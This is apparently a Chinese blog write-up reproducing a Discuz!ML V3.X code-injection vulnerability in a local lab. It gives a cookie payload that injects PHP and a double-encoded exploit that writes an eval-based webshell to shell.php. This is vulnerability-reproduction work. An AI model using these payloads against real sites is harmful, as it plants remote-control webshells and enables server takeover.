Discuz!ML V3.X 代码注入漏洞复现

0x01 环境搭建

源码下载地址：https://bitbucket.org/vot/discuz.ml/get/tip.zip(需翻墙)

集成环境：phpstudy

搭建成功截图

0x02 漏洞复现

使用burp抓包

漏洞存在此页面

http://192.168.1.51/dz3.4/upload/portal.php

payload：Tt13_2132_language=es '.phpinfo().';

payload
'. file_put_contents('shell.php',urldecode('<?php eval($_GET["jaky"]);?>')).'
需要进行两次编码
exp：
%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2547%2545%2554%255b%2522jaky%2522%255d%29%253b%253f%253e%27%29%29.%27

0x03 总结

本来想根据里面的漏洞审计下代码，看看漏洞是怎么形成的，无奈技术太菜，只能放弃，exp是经过两次编码得到的，第一次是对一句话进行编码，第二次是所有的字符进行编码，但是一句话编码这里出了点问题，GET单词没有被编码，导致木马写不进去，所以还是用的大佬写的exp。也尝试了写一个webshell用caidao连接，估计也是我刚刚说的那个问题，没有成功，遇到的坑大概就是这些。。